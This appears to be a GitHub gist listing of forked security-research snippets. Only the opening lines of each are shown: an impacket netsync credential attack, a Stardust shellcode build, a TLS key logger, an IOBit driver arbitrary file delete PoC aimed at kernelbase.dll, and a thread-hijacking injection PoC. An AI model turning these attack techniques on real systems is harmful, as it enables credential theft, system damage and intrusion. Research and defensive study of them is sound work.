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gavz / ws.cpp
Created March 17, 2025 22:06 — forked from AndreyBazhan/ws.cpp
Process Explorer: Process Properties->Performance tab performance issue
#include <Windows.h>
#include <psapi.h>
int main()
HANDLE ProcessHandle;
ULONG Processes[4096];
ULONG DataSize;
ULONG NumberOfProcesses;
gavz /
Created March 7, 2025 23:37 — forked from ThePirateWhoSmellsOfSunflowers/
This script perform a netsync attack. No SMB involved
from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr
from impacket.uuid import bin_to_uuidtup
from impacket.crypto import SamDecryptNTLMHash
from binascii import unhexlify, hexlify
from random import randbytes
import sys
import argparse
# This script perform a netsync attack. No SMB involved
# My first idea was to only use netlogon SSP, however SAMR seems not compatible
gavz / CMakeLists.txt
Created March 7, 2025 23:20 — forked from MEhrn00/CMakeLists.txt
Building Stardust with CMake
cmake_minimum_required(VERSION 3.24)
# Build option for generating the final shellcode.bin file
option(STARDUST_BUILD_SHELLCODE "Build the final shellcode.bin file" OFF)
# Add nasm for the Stardust.asm source if building shellcode
gavz / PE-Inspect-PortableExecutable-Namespace.ps1
Last active March 4, 2025 23:52 — forked from Dump-GUY/PE-Inspect-PortableExecutable-Namespace.ps1
PowerShell (pwsh): PE-Inspect-PortableExecutable-Namespace
function Expand-Properties($Object, $Depth = 5, $Indent = 0) {
if ($Depth -le 0 -or $null -eq $Object) { return } $prefix = " " * $Indent
$Object | gm -m Property | % {
$pValue = $Object.$($_.Name)
if ($pValue -is [Enum]) { Write-Host "$prefix$($_.Name): " -F Green -N; Write-Host "$pValue" -F Blue }
elseif ($null -eq $pValue) { Write-Host "$prefix$($_.Name): " -F Green -N; Write-Host "(null)" -F Blue }
elseif ($pValue -is [Collections.IEnumerable] -and $pValue -isnot [string]) { Write-Host "$prefix$($_.Name): " -F Green; $pValue | % { Expand-Properties $_ ($Depth - 1) ($Indent + 4) } }
elseif ($pValue -is [PSObject] -or $pValue.GetType().Namespace -match "^System.Reflection") { Write-Host "$prefix$($_.Name): " -F Green; Expand-Properties $pValue ($Depth - 1) ($Indent + 4) }
else { Write-Host "$prefix$($_.Name): " -F Green -N; Write-Host "$pValue" -F Blue }}}
Expand-Properties ([Reflection.PortableExecutable.PEReader]::new([IO.File]::OpenRead([IO.Path]::G
gavz / tls-keylogger.ps1
Created February 11, 2025 23:09 — forked from jborean93/tls-keylogger.ps1
Logs Wireshark compatible TLS keys like the SSLKEYLOGFILE env var
#Requires -Module PSDetour
param (
$LogPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($LogPath)
gavz /
Created February 7, 2025 19:46 — forked from ThePirateWhoSmellsOfSunflowers/
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys
# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (
# Tested with impacket 0.12.0 on GOAD
# probably exists in a better form; but script is useful for caching OS modules based on major OS version/build and file
# hash. intended to make life easier, ymmv.
# .\symcache.ps1 -src "C:\Windows\System32\drivers" -dst "X:\Windows\drivers"
# ^^ This will copy and organize the bins in the subdirectory and recurse through all subdirectories, and then download
# the symbols if they are available.
# - daax
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "winmm.lib")
void Nothing(WORD wKey)
void PrintKey(WORD wKey)
gavz / IOBitStillSucks.cpp
Created January 7, 2025 18:36 — forked from alfarom256/IOBitStillSucks.cpp
Arbitrary File Delete in IOBit Malware Fighter "Pro"
#include <Windows.h>
#include <stdio.h>
const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)";
const char* strDeviceName = R"(\\.\IMFForceDelete123)";
int main() {
DWORD dwReturnVal = 0;
DWORD dwBytesReturned = 0;
gavz / TROPH.c
Created December 30, 2024 20:59 — forked from UmaRex01/TROPH.c
Thread Hijacking without executable memory allocation PoC
* Thread Hijacking without executable memory allocation PoC
* @UmaRex01
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>